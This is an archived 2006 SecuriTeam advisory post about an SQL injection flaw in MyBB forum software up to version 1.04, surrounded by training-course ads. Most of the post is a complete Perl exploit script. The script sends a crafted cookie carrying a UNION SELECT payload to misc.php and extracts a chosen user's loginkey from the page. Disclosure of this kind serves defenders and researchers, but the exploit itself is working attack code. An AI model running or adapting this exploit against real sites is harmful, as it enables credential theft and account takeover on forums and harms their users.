Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[EXPL] MyBB SQL Injection (Exploit)

Subject: [EXPL] MyBB SQL Injection (Exploit)
Date: 16 Mar 2006 14:16:38 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  MyBB SQL Injection (Exploit)
------------------------------------------------------------------------


SUMMARY

"MyBB is a powerful, efficient and free forum package developed in PHP and 
MySQL."

Lack of input filtering allows attackers to perform SQL injection on MyBB.

DETAILS

Vulnerable Systems:
 * MyBB version 1.04 and prior

Exploit:
#!/usr/bin/perl -w

# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
#
# Milw0rm ID :-
#                       http://www.milw0rm.com/auth.php?id=1539
# D3vil-0x1 | Devil-00 < BlackHat > :)
#
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
use IO::Socket;

##-- Start --#

$host   = "127.0.0.1";
$path           = "/mybb3/";
$userid = 1;
$mycookie       = 
"mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";

##-- _END_ --##
#       $host           :-
#                               The Host Name Without http:// | exm. 
www.vic.com
#
#       $path           :-
#                               MyBB Dir On Server | exm. /mybb/
#
#       $userid :-
#                               The ID Of The User U Wanna To Get His 
Loginkey
#
#       $cookie :-
#                               You Must Register Username And Get 
YourCookies ( mybb_user ) Then But it Like This
#
#                               $cookie         = 
"mybbuser=[YourID]_[YourLoginkey];";
$sock = IO::Socket::INET->new (
                                                                           
     PeerAddr => "$host",
                                                                           
     PeerPort        => "80",
                                                                           
     Proto           => "tcp"
                                                                           
     ) or die("[!] Connect To Server Was Filed");
##-- DONT TRY TO EDIT ME --##
$evilcookie = 
"comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1
 FROM mybb_users WHERE uid=$userid/*;";
##-- DONT TRY TO EDIT ME --##
$evildata  = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n";
$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";

print $sock $evildata;

while($ans = <$sock>){
        $ans =~ m/<a href=\"member.php\?action=profile&uid=1\" 
target=\"_blank\">(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- 
".$1."\n";
}

#EoF


ADDITIONAL INFORMATION

The information has been provided by  <mailto:o.y.6@hotmail.com> Devil-00.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] MyBB SQL Injection (Exploit), SecuriTeam <=